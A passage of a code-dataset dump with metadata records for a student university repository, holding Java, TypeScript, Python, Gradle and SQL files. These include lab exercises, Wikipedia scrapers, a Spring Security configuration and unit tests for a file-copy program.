}\n }\n\n}\n" }, { "alpha_fraction": 0.621107280254364, "alphanum_fraction": 0.6435986161231995, "avg_line_length": 20.230770111083984, "blob_id": "843486c38c594796d7f9dc5247106981bfb6ab43", "content_id": "26a40c720a910c5d1809576b105baf9182a4a9f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 578, "license_type": "no_license", "max_line_length": 85, "num_lines": 26, "path": "/despat/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "group 'io.bitbucket.gregoryk1'\r\nversion '1.0-SNAPSHOT'\r\n\r\napply plugin: 'java'\r\n\r\ntask fatJar(type: Jar) {\r\n\tmanifest {\r\n attributes 'Implementation-Title': 'Design patterns',\r\n \t'Implementation-Version': version\r\n }\r\n baseName = project.name + '-all'\r\n from { configurations.compile.collect { it.isDirectory() ? it : zipTree(it) } }\r\n with jar\r\n}\r\n\r\nsourceCompatibility = 1.8\r\ntargetCompatibility = 1.8\r\n\r\nrepositories {\r\n mavenCentral()\r\n}\r\n\r\ndependencies {\r\n compile \"io.codearte.jfairy:jfairy:0.5.5\"\r\n testCompile \"junit:junit:4.12\"\r\n}\r\n" }, { "alpha_fraction": 0.6912878751754761, "alphanum_fraction": 0.6998106241226196, "avg_line_length": 28.171428680419922, "blob_id": "ed210b750bbac5639ca2b5000a77ebe82861e331", "content_id": "8899d75828230c89c983aaefeeaaffadd4371adf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1056, "license_type": "no_license", "max_line_length": 61, "num_lines": 35, "path": "/otp/src/test/java/io/github/k_gregory/otp/lab1/Task2Theories.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab1;\r\n\r\nimport io.github.k_gregory.otp.lab1.impl.StateFSM;\r\nimport org.junit.experimental.theories.DataPoint;\r\nimport org.junit.experimental.theories.Theories;\r\nimport org.junit.experimental.theories.Theory;\r\nimport org.junit.runner.RunWith;\r\n\r\nimport java.util.regex.Pattern;\r\n\r\nimport static org.junit.Assert.assertFalse;\r\nimport static org.junit.Assert.assertTrue;\r\nimport static org.junit.Assume.assumeFalse;\r\nimport static org.junit.Assume.assumeTrue;\r\n\r\n\r\n@RunWith(Theories.class)\r\npublic class Task2Theories {\r\n @DataPoint\r\n public static String matched = \"+330FIK\";\r\n @DataPoint\r\n public static String notMatched = \"+330FIk\";\r\n\r\n @Theory\r\n public void correctAccepted(String param) {\r\n assumeTrue(Pattern.matches(\"\\\\+\\\\d+[A-Z]*\", param));\r\n assertTrue(new StateFSM().match(param));\r\n }\r\n\r\n @Theory\r\n public void lowerCaseNotAccepted(String param) {\r\n assumeFalse(Pattern.matches(\"\\\\+\\\\d+[A-Z]*\", param));\r\n assertFalse(new StateFSM().match(param));\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6072449684143066, "alphanum_fraction": 0.6148713231086731, "avg_line_length": 18.979999542236328, "blob_id": "99fd2a6b5944c5b1ea1041fd181db08d880175a2", "content_id": "d6dc2885b446f6e4fcadb91bfb86caf3bd0d4bdc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1049, "license_type": "no_license", "max_line_length": 59, "num_lines": 50, "path": "/oldtest/rss-reader/src/main/java/io/github/k_gregory/otp/rss_reader/entity/FeedItem.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.rss_reader.entity;\r\n\r\nimport javax.persistence.Entity;\r\nimport javax.persistence.GeneratedValue;\r\nimport javax.persistence.GenerationType;\r\nimport javax.persistence.Id;\r\n\r\n/**\r\n * Created by grego on 13.05.2017.\r\n */\r\n@Entity\r\npublic class FeedItem {\r\n private Integer id;\r\n private String title;\r\n private String link;\r\n private String description;\r\n\r\n public String getTitle() {\r\n return title;\r\n }\r\n\r\n public void setTitle(String title) {\r\n this.title = title;\r\n }\r\n\r\n public String getLink() {\r\n return link;\r\n }\r\n\r\n public void setLink(String link) {\r\n this.link = link;\r\n }\r\n\r\n public String getDescription() {\r\n return description;\r\n }\r\n\r\n public void setDescription(String description) {\r\n this.description = description;\r\n }\r\n\r\n @Id @GeneratedValue(strategy = GenerationType.IDENTITY)\r\n public Integer getId() {\r\n return id;\r\n }\r\n\r\n public void setId(Integer id) {\r\n this.id = id;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7447229623794556, "alphanum_fraction": 0.7453826069831848, "avg_line_length": 34.25581359863281, "blob_id": "7a6928e1dfea5edddaa970903d44eaf208d9a1e5", "content_id": "3eb51543f644a00b945cf11c13d9fe64dd8244e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1516, "license_type": "no_license", "max_line_length": 100, "num_lines": 43, "path": "/numerical-methods/src/app/app.module.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { BrowserModule } from '@angular/platform-browser';\nimport { NgModule } from '@angular/core';\n\nimport { AppComponent } from './app.component';\nimport { BrowserAnimationsModule } from '@angular/platform-browser/animations';\nimport {MyMaterialModule} from \"./my-material/my-material.module\";\nimport { InterpolationComponent } from './interpolation/interpolation.component';\nimport { IntegrationComponent } from './integration/integration.component';\nimport {RouterModule, Routes} from \"@angular/router\";\nimport { NewtonSecondEvenlyComponent } from './newton-second-evenly/newton-second-evenly.component';\nimport { NewtonFirstComponent } from './newton-first/newton-first.component';\nimport { TrapezoidComponent } from './trapezoid/trapezoid.component';\nimport { RombergComponent } from './romberg/romberg.component';\nimport {routes} from \"./routes\";\nimport { FileInputComponent } from './file-input/file-input.component';\nimport {ChartsModule} from \"ng2-charts\";\nimport {FormsModule} from \"@angular/forms\";\n\n@NgModule({\n declarations: [\n AppComponent,\n InterpolationComponent,\n IntegrationComponent,\n NewtonSecondEvenlyComponent,\n NewtonFirstComponent,\n TrapezoidComponent,\n RombergComponent,\n FileInputComponent,\n ],\n imports: [\n RouterModule.forRoot(routes, {\n enableTracing: false\n }),\n BrowserModule,\n BrowserAnimationsModule,\n FormsModule,\n MyMaterialModule,\n ChartsModule\n ],\n providers: [],\n bootstrap: [AppComponent]\n})\nexport class AppModule { }\n" }, { "alpha_fraction": 0.6477611660957336, "alphanum_fraction": 0.6507462859153748, "avg_line_length": 28.568628311157227, "blob_id": "29ea970c715026baf62a1803547ece338b9e0acc", "content_id": "c3356fc61a2574d8d705e9ce739c4d69b3b4d5fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3015, "license_type": "no_license", "max_line_length": 109, "num_lines": 102, "path": "/db/sem2/lab2/download_articles.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import requests\nimport sys\nfrom lxml import etree as ET\nimport pandas\n\n\nif len(sys.argv) != 3:\n sys.exit('Specify category name and output file name')\n\ncategory_name = sys.argv[1]\nroot_name = 'Category:' + category_name\n\n\nAPI_URL = 'https://en.wikipedia.org/w/api.php'\nMAX_SUBCATEGORIES = 2\nMAX_ARTICLES = 2\nMAX_DOWNLOAD_ARTICLES = 2\n\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\ndef make_subcategory_query(category_name):\n return {\n 'action': 'query',\n 'format': 'xml',\n 'list': 'categorymembers',\n 'cmtitle': 'Category:' + category_name,\n 'cmtype': 'subcat',\n 'cmlimit': MAX_SUBCATEGORIES\n }\n\n\ndef make_subcategory_articles_query(category_pageid):\n return {\n 'action': 'query',\n 'format': 'xml',\n 'list': 'categorymembers',\n 'cmpageid': category_pageid,\n 'cmtype': 'page',\n 'cmlimit': MAX_ARTICLES\n }\n\n\nroot_category_articles_query = {\n 'action': 'query',\n 'format': 'xml',\n 'list': 'categorymembers',\n 'cmtitle': root_name,\n 'cmtype': 'page',\n 'cmlimit': MAX_ARTICLES\n}\n\ndef make_pages_query(page_ids):\n id_list = '|'.join([str(x) for x in page_ids])\n return {\n 'action': 'query',\n 'format': 'xml',\n 'prop': 'revisions|categories',\n 'pageids': id_list,\n 'rvprop': 'content'\n }\n\n\ndef get_page_ids(category_name):\n subcategories_data = requests.get(API_URL, params=make_subcategory_query(category_name))\n subcategories = ET.fromstring(subcategories_data.content)\n\n for subcategory in subcategories.xpath('/api/query/categorymembers/cm'):\n subcategory_title = subcategory.get('title')\n subcategory_id = subcategory.get('pageid')\n subcategory_page_data = requests.get(API_URL, params=make_subcategory_articles_query(subcategory_id))\n subcategory_page = ET.fromstring(subcategory_page_data.content)\n for article_id in subcategory_page.xpath('/api/query/categorymembers/cm/@pageid'):\n yield (subcategory_title, article_id)\n\n direct_articles_data = requests.get(API_URL, params=root_category_articles_query)\n direct_articles = ET.fromstring(direct_articles_data.content)\n for article_id in direct_articles.xpath('/api/query/categorymembers/cm/@pageid'):\n yield (root_name, article_id)\n\n\ndef download_pages(page_ids):\n for ids_chunk in chunks(page_ids, MAX_DOWNLOAD_ARTICLES):\n page_data = requests.get(API_URL, params=make_pages_query(ids_chunk))\n page = ET.fromstring(page_data.content)\n yield from page.xpath('/api/query/pages/page')\n\n\ndata = list(get_page_ids(category_name))\ndf = pandas.DataFrame(data)\nunique_page_ids =df[1].unique()\nby_category = df.groupby(0)\n\n#Write pages to file\nxml_root = ET.Element('pages')\nfor page in download_pages(unique_page_ids):\n xml_root.append(page)\nwith open(sys.argv[2], 'wb') as f:\n f.write(ET.tostring(xml_root, pretty_print=True))" }, { "alpha_fraction": 0.7754985690116882, "alphanum_fraction": 0.7754985690116882, "avg_line_length": 37.15217208862305, "blob_id": "a82ce1fc90aa4ebab3a7f6f608bc532f5c34a704", "content_id": "4d75027830ee237a944ddd8bbdb23b222463ade2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1755, "license_type": "no_license", "max_line_length": 108, "num_lines": 46, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/ConsultCollegaue.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult;\n\nimport com.fasterxml.jackson.databind.ObjectMapper;\nimport com.fasterxml.jackson.databind.ObjectWriter;\nimport io.github.k_gregory.insurance.service.consult.data.ConsultNotification;\nimport org.springframework.web.socket.CloseStatus;\nimport org.springframework.web.socket.TextMessage;\nimport org.springframework.web.socket.WebSocketSession;\nimport org.springframework.web.socket.handler.TextWebSocketHandler;\n\nimport java.io.IOException;\n\npublic abstract class ConsultCollegaue extends TextWebSocketHandler {\n protected WebSocketSession session;\n protected static final ObjectMapper objectMapper = new ObjectMapper();\n private static final ObjectWriter writer = objectMapper.writerWithDefaultPrettyPrinter();\n protected final ConsultMediator mediator;\n\n protected ConsultCollegaue(ConsultMediator mediator) {\n this.mediator = mediator;\n }\n\n public String getId(){\n return session.getId();\n }\n\n @Override\n public final void afterConnectionClosed(WebSocketSession session, CloseStatus status) throws Exception {\n disconnectFromMediator(mediator);\n }\n public abstract void disconnectFromMediator(ConsultMediator mediator);\n\n @Override\n public final void afterConnectionEstablished(WebSocketSession session) throws Exception {\n this.session = session;\n connectToMediator(mediator);\n }\n\n public abstract void connectToMediator(ConsultMediator mediator);\n\n public void sendNotification(ConsultNotification o) throws IOException {\n if(!session.isOpen()) throw new IOException(\"Session already closed\");\n String msg = writer.writeValueAsString(o);\n session.sendMessage(new TextMessage(msg));\n }\n}\n" }, { "alpha_fraction": 0.7366771101951599, "alphanum_fraction": 0.7366771101951599, "avg_line_length": 39.33333206176758, "blob_id": "c8455728c708a91358b98e3c3ed854e810367450", "content_id": "e3dc0d8c429d9d21e37f40626bc32cccc2bc102d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3509, "license_type": "no_license", "max_line_length": 107, "num_lines": 87, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/configuration/SecurityConfig.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.configuration;\n\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.beans.factory.annotation.Value;\nimport org.springframework.context.annotation.Bean;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;\nimport org.springframework.security.config.annotation.method.configuration.EnableGlobalMethodSecurity;\nimport org.springframework.security.config.annotation.web.builders.HttpSecurity;\nimport org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;\nimport org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;\nimport org.springframework.security.config.core.GrantedAuthorityDefaults;\nimport org.springframework.security.core.userdetails.UserDetailsService;\nimport org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;\nimport org.springframework.security.crypto.password.PasswordEncoder;\nimport org.springframework.security.web.authentication.RememberMeServices;\nimport org.springframework.security.web.authentication.rememberme.JdbcTokenRepositoryImpl;\nimport org.springframework.security.web.authentication.rememberme.PersistentTokenBasedRememberMeServices;\nimport org.springframework.security.web.csrf.CookieCsrfTokenRepository;\n\nimport javax.sql.DataSource;\n\n@Configuration\n@EnableWebSecurity\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n private final UserDetailsService userDetailsService;\n private final DataSource ds;\n @Value(\"${app.remember-me.parameter-name}\")\n private String rememberMeParameter;\n @Value(\"${app.remember-me.key}\")\n private String securityKey;\n\n @Autowired\n public SecurityConfig(UserDetailsService userDetailsService,\n DataSource ds) {\n this.userDetailsService = userDetailsService;\n this.ds = ds;\n }\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n http\n .authorizeRequests()\n .antMatchers(\"/register/**\").permitAll()\n .anyRequest().authenticated().and()\n .formLogin()\n .loginPage(\"/login\")\n .permitAll().and()\n .rememberMe()\n .rememberMeParameter(rememberMeParameter)\n .key(securityKey)\n .rememberMeServices(rememberMeServices()).and()\n .csrf()\n .csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());\n }\n\n @Override\n protected void configure(AuthenticationManagerBuilder auth) throws Exception {\n auth\n .userDetailsService(userDetailsService)\n .passwordEncoder(passwordEncoder());\n }\n\n @Bean\n public PasswordEncoder passwordEncoder() {\n return new BCryptPasswordEncoder();\n }\n\n @Bean\n RememberMeServices rememberMeServices() {\n JdbcTokenRepositoryImpl tokenRepository = new JdbcTokenRepositoryImpl();\n tokenRepository.setDataSource(ds);\n return new PersistentTokenBasedRememberMeServices(\n securityKey,\n userDetailsService,\n tokenRepository\n );\n }\n\n\n @Bean\n public GrantedAuthorityDefaults grantedAuthorityDefaults() {\n return new GrantedAuthorityDefaults(\"\");\n }\n\n}\n" }, { "alpha_fraction": 0.6372372508049011, "alphanum_fraction": 0.6408408284187317, "avg_line_length": 31.299999237060547, "blob_id": "813d4abdfebf6ee39b926b2c4bd776ab5003b7d7", "content_id": "10ca8ac7fb6cd362ca695ffcb6394d870fa49ea3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1665, "license_type": "no_license", "max_line_length": 96, "num_lines": 50, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab2/MatrixEvalutor.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2;\r\n\r\nimport io.github.k_gregory.otp.lab1.ParseException;\r\nimport io.github.k_gregory.otp.lab2.datatypes.MathVal;\r\nimport org.antlr.v4.runtime.ANTLRInputStream;\r\nimport org.antlr.v4.runtime.CommonTokenStream;\r\n\r\nimport java.util.HashMap;\r\nimport java.util.Map;\r\nimport java.util.Scanner;\r\n\r\npublic class MatrixEvalutor {\r\n private final Map<String, MathVal> memory;\r\n\r\n public MatrixEvalutor(Map<String, MathVal> memory) {\r\n this.memory = memory;\r\n }\r\n\r\n public MatrixEvalutor() {\r\n this(new HashMap<>());\r\n }\r\n\r\n public static void main(String... args) {\r\n MatrixEvalutor evalutor = new MatrixEvalutor();\r\n Scanner scanner = new Scanner(System.in);\r\n scanner.useDelimiter(\"\\\\R+\");\r\n while (scanner.hasNext()) {\r\n try {\r\n System.out.println(evalutor.evalute(scanner.next()));\r\n } catch (Exception e) {\r\n e.printStackTrace();\r\n }\r\n }\r\n }\r\n\r\n public void clearMemory() {\r\n memory.clear();\r\n }\r\n\r\n public MathVal evalute(String expression) {\r\n ANTLRInputStream inputStream = new ANTLRInputStream(expression);\r\n MatrixLexer lexer = new MatrixLexer(inputStream);\r\n CommonTokenStream tokenStream = new CommonTokenStream(lexer);\r\n MatrixParser parser = new MatrixParser(tokenStream);\r\n CalculatorVisitor visitor = new CalculatorVisitor(memory);\r\n MatrixParser.DefProgContext tree = parser.defProg();\r\n if (parser.getNumberOfSyntaxErrors() != 0) throw new ParseException(\"Bad source code!\");\r\n return visitor.visit(tree);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6272028684616089, "alphanum_fraction": 0.637144148349762, "avg_line_length": 26.662500381469727, "blob_id": "0387addddd2741f2f06754cd6d4ae2e1573772b7", "content_id": "51de33f68a0f3c6765a10591d822392514e377a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 113, "num_lines": 80, "path": "/hotels/tourism/dimport/research.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import os\nimport django\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"tourism.settings\")\ndjango.setup()\n\nfrom hotels.models import Country, Hotel\n\n\ndef parse_simple(url):\n result = requests.get(url)\n soup = BeautifulSoup(result.content, \"html.parser\")\n paragraphs = soup.find_all(\"p\")\n\n if len(paragraphs) < 2:\n raise RuntimeError(\"No paragraph\")\n\n paragraphs.sort(key=lambda p: -len(p.text))\n\n if not paragraphs[0].text:\n raise RuntimeError(\"Empty paragraph\")\n\n return paragraphs[0].text\n\nbase_url = \"https://en.wikipedia.org\"\n\nresult = requests.get(base_url + \"/wiki/List_of_largest_hotels\")\nsoup = BeautifulSoup(result.content, \"html.parser\")\n\ntables = soup.find_all('table')\ntables.sort(key=lambda t: len(t.find_all('tr')))\ntable = tables[-1]\ntable_rows = table.find_all('tr')[1:]\n\ncountries = {}\ncountry_hotels = {}\n\nfor idx, row in enumerate(table_rows):\n try:\n print((idx, len(table_rows)))\n tds = row.find_all('td')\n name_td = tds[1]\n country_td = tds[2]\n\n hotel_name = name_td.a.string\n country_name = country_td.a.string\n\n if country_name not in countries:\n countries[country_name] = parse_simple(base_url + country_td.a['href'])\n\n if country_name not in country_hotels:\n country_hotels[country_name] = []\n\n country_hotels[country_name].append({\n 'name': hotel_name,\n 'description': parse_simple(base_url + name_td.a['href'])\n })\n except Exception as e:\n print(e)\n print(row)\n\nfinal_hotels = [(country_name, hotel)\n for country_name, hotels in country_hotels.items()\n for hotel in hotels[:15] if len(hotels) > 0]\n\n\nsaved_countries = {}\n\nfor country_name, description in countries.items():\n saved_countries[country_name] = Country.objects.create(name = country_name, description = description[:2000])\n\nfor country_name, hotel in final_hotels:\n Hotel(name=hotel['name'],\n brief_description=hotel['description'][:150],\n description = hotel['description'][:2000],\n country = saved_countries[country_name]\n ).save()\n" }, { "alpha_fraction": 0.5916398763656616, "alphanum_fraction": 0.5964630246162415, "avg_line_length": 20.214284896850586, "blob_id": "9ba95cc454aca86cad788bb1f982531872f0d9ed", "content_id": "b4e6fec55f5233d25a6909d5d8d501ba2539c637", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 622, "license_type": "no_license", "max_line_length": 61, "num_lines": 28, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/SweetRoll.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\npublic class SweetRoll implements Gift {\r\n private String taste;\r\n\r\n public SweetRoll(String taste) {\r\n this.taste = taste;\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return \"sweet roll with \" + taste;\r\n }\r\n\r\n public void checkTaste() {\r\n System.out.println(toString() + \" tastes delicious\");\r\n }\r\n\r\n @Override\r\n public Gift clone() throws CloneNotSupportedException {\r\n return (SweetRoll) super.clone();\r\n }\r\n\r\n @Override\r\n public void accept(GiftVisitor v) {\r\n v.visit(this);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6740157604217529, "alphanum_fraction": 0.6740157604217529, "avg_line_length": 24.399999618530273, "blob_id": "c58b4d7a477a343d493eb5bfa82f25d1298f90cc", "content_id": "0243e1828242b939d7b11511a09d5bed57180379", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 635, "license_type": "no_license", "max_line_length": 73, "num_lines": 25, "path": "/numerical-methods/src/app/romberg/romberg.component.spec.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { async, ComponentFixture, TestBed } from '@angular/core/testing';\n\nimport { RombergComponent } from './romberg.component';\n\ndescribe('RombergComponent', () => {\n let component: RombergComponent;\n let fixture: ComponentFixture<RombergComponent>;\n\n beforeEach(async(() => {\n TestBed.configureTestingModule({\n declarations: [ RombergComponent ]\n })\n .compileComponents();\n }));\n\n beforeEach(() => {\n fixture = TestBed.createComponent(RombergComponent);\n component = fixture.componentInstance;\n fixture.detectChanges();\n });\n\n it('should create', () => {\n expect(component).toBeTruthy();\n });\n});\n" }, { "alpha_fraction": 0.5015015006065369, "alphanum_fraction": 0.5105105042457581, "avg_line_length": 17.5, "blob_id": "9859515d83dd2d9cb41207e46cac47ccac2e80c8", "content_id": "f4cc9e049e407c2fd3f6de5571b0fd294e92db07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 333, "license_type": "no_license", "max_line_length": 103, "num_lines": 18, "path": "/numerical-methods/src/app/trapetion.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export function trapetion_simple(f: (number) => number, low: number, high: number, h: number): number {\n let n = Math.ceil((high - low) / h);\n h = (high - low) / n;\n\n console.log(n);\n\n let res = 0;\n\n res += (f(low) + f(high)) / 2;\n\n for(let i = 1; i < n; i++){\n res += f(low + i * h);\n }\n\n res = res * h;\n\n return res;\n}\n" }, { "alpha_fraction": 0.7616279125213623, "alphanum_fraction": 0.7616279125213623, "avg_line_length": 32.44444274902344, "blob_id": "a3cf2bdca7771a4bafc6d432ed0be718a7d15e34", "content_id": "8cafe2fa51548b1ea181d9b2c6640b0980f50486", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1204, "license_type": "no_license", "max_line_length": 107, "num_lines": 36, "path": "/insurance/frontend/src/app/app.module.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { BrowserModule } from '@angular/platform-browser';\nimport { NgModule } from '@angular/core';\nimport {RouterModule, Routes} from '@angular/router'\nimport {FormsModule} from \"@angular/forms\"\n\nimport { AppComponent } from './app.component';\nimport { SupporterConsultationComponent } from './supporter-consultation/supporter-consultation.component';\nimport { ClientConsultationComponent } from './client-consultation/client-consultation.component';\nimport {ClientConsultationService} from './client-consultation.service';\nimport {SupporterConsultationService} from './supporter-consultation.service';\nimport { MessagesComponent } from './messages/messages.component';\n\nconst appRoutes: Routes = [\n {path: \"client\", component: ClientConsultationComponent},\n {path: \"support\", component: SupporterConsultationComponent}\n];\n\n@NgModule({\n declarations: [\n AppComponent,\n SupporterConsultationComponent,\n ClientConsultationComponent,\n MessagesComponent\n ],\n imports: [\n FormsModule,\n BrowserModule,\n RouterModule.forRoot(appRoutes)\n ],\n providers: [\n ClientConsultationService,\n SupporterConsultationService\n ],\n bootstrap: [AppComponent]\n})\nexport class AppModule { }\n" }, { "alpha_fraction": 0.6031623482704163, "alphanum_fraction": 0.609332799911499, "avg_line_length": 33.1184196472168, "blob_id": "c8262da7bad71c77655e56384beac50df7ca0be1", "content_id": "bc5cd649b47f937d2cca62c24b558dbba38a8452", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5186, "license_type": "no_license", "max_line_length": 80, "num_lines": 152, "path": "/system_programming/lab1/task1/test.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import unittest\nimport subprocess as sp\nimport os\nfrom stat import ST_MODE, ST_ATIME, ST_MTIME, ST_CTIME, ST_SIZE\nfrom pathlib import Path\n\ndef overwrite(filename, content):\n with open(filename, 'w') as f:\n f.write(content)\n\ndef simple_read(filename):\n with open(filename, 'r') as f:\n return f.read()\n\ndef call_prog(*args):\n def decode_out(output):\n return output.decode('utf-8').strip()\n\n proc = sp.Popen(['./build/main', *args], stdout=sp.PIPE, stderr=sp.PIPE)\n (stdout, stderr) = proc.communicate(timeout=10)\n (stdout, stderr) = (decode_out(stdout), decode_out(stderr))\n\n returncode = proc.returncode\n return (returncode, stdout, stderr)\n\nclass TestFileCopying(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.in_filename = '/tmp/will-be-overwritten'\n self.out_filename = '/tmp/will-be-removed'\n self.same_filename = '/tmp/will-be-overwritten2'\n self.link_src = 'will-be-overwritten2' #depends on same_filename\n self.nonexist_filename = '/does/not/exist'\n self.link_filename = '/tmp/link-overwritten'\n\n assert not os.path.exists(self.nonexist_filename)\n\n\n def setUp(self):\n for f in [self.in_filename, \n self.out_filename, \n self.same_filename,\n self.link_filename]:\n try:\n os.remove(f)\n except FileNotFoundError:\n pass\n\n\n def test_args_count(self):\n for args in [(), \n (self.in_filename,), \n (self.in_filename, self.out_filename, self.same_filename)]:\n with self.subTest(args=args):\n (code, out, err) = call_prog(*args)\n self.assertEqual(code, 1)\n self.assertEqual(out, '')\n self.assertIn('Usage', err)\n\n def test_nonexistent_input_files_fail(self):\n (code, out, err) = call_prog('/does/not/exist', self.out_filename)\n self.assertEqual(code, 1)\n self.assertEqual(out, '')\n self.assertIn('No such file', err)\n\n def test_existent_file_not_removed(self):\n overwrite(self.in_filename, 'dummy')\n overwrite(self.out_filename, 'other dummy')\n os.chmod(self.out_filename, 0o220)\n\n pre_run_stat = list(os.stat(self.out_filename))\n (code, out, err) = call_prog(self.in_filename, self.out_filename)\n post_run_stat = list(os.stat(self.out_filename))\n for key in [ST_ATIME, ST_CTIME, ST_MTIME, ST_SIZE]:\n post_run_stat[key] = pre_run_stat[key]\n\n self.assertEqual(pre_run_stat, post_run_stat)\n self.assertEqual(code, 0)\n self.assertEqual(err, '')\n self.assertIn('Wrote', out)\n\n\n def test_file_created(self):\n overwrite(self.in_filename, 'dummy')\n (return_code, out, err) = call_prog(self.in_filename, self.out_filename)\n file_exists = Path(self.out_filename).is_file()\n file_mode = os.stat(self.out_filename)[ST_MODE]\n\n self.assertEqual(return_code, 0)\n self.assertTrue(file_exists)\n self.assertEqual(file_mode, 0o100644)\n self.assertEqual(err, '')\n self.assertIn('Wrote', out);\n\n def test_src_dest_name_must_differ(self):\n overwrite(self.same_filename, 'some text')\n\n (code, out, err) = call_prog(self.same_filename, self.same_filename)\n\n self.assertEqual(code, 1)\n self.assertEqual(out, '')\n self.assertIn('different files', err)\n\n def test_symlinks_must_differ(self):\n overwrite(self.same_filename, 'some dummy')\n os.symlink(self.link_src, self.link_filename)\n\n (code, out, err) = call_prog(self.same_filename, self.link_filename)\n\n self.assertEqual(code, 1)\n self.assertEqual(out, '')\n self.assertIn('different files', err)\n\n def test_hardlinks_must_differ(self):\n overwrite(self.same_filename, 'some dummy')\n os.link(self.same_filename, self.link_filename)\n\n (code, out, err) = call_prog(self.same_filename, self.link_filename)\n\n self.assertEqual(code, 1)\n self.assertEqual(out, '')\n self.assertIn('different files', err)\n\n def assertRunWithText(self, text):\n overwrite(self.in_filename, text)\n\n (code, out, err) = call_prog(self.in_filename, self.out_filename)\n res_content = simple_read(self.out_filename)\n\n self.assertEqual(code, 0)\n self.assertEqual(err, '')\n self.assertIn('Wrote', out)\n self.assertIn(str(len(text)), out)\n self.assertEqual(text.lower(), res_content)\n\n def test_overwrites_existing_content(self):\n overwrite(self.out_filename, 'This will not be written after test')\n self.assertRunWithText('Will be in file')\n\n def test_content_written(self):\n content = 'QWerTYU\\tiOpjk\\ndASdFGhKLXCvbnrTYI\\0sdEWRdfDRwErVRwerFSrre\\n'\n content = content * 20\n\n assert len(content) > 1024\n\n for i in range(0, len(content)):\n text = content[:i]\n with self.subTest(content=text):\n self.assertRunWithText(text)\n\nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.7070063948631287, "alphanum_fraction": 0.7197452187538147, "avg_line_length": 20.454545974731445, "blob_id": "45ec0593888d7fd4c3e0cd614a0baaf0681d775d", "content_id": "d4d95ad9bd28ee4b0290c4b218259ff414264b76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 471, "license_type": "no_license", "max_line_length": 39, "num_lines": 22, "path": "/insurance/backend/src/main/resources/db/migration/V1__create_principal_tables.sql", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "CREATE TABLE \"user\"(\n login TEXT PRIMARY KEY NOT NULL,\n password_hash TEXT NOT NULL\n);\n\nCREATE TABLE role(\n role_name TEXT PRIMARY KEY NOT NULL\n);\n\nCREATE TABLE user_roles(\n login TEXT REFERENCES \"user\"(login),\n role TEXT REFERENCES role(role_name),\n PRIMARY KEY (login, role)\n);\n\nCREATE TABLE persistent_logins (\n username varchar(64) not null,\n series varchar(64) not null,\n token varchar(64) not null,\n last_used timestamp not null,\n PRIMARY KEY (series)\n);" }, { "alpha_fraction": 0.7471747994422913, "alphanum_fraction": 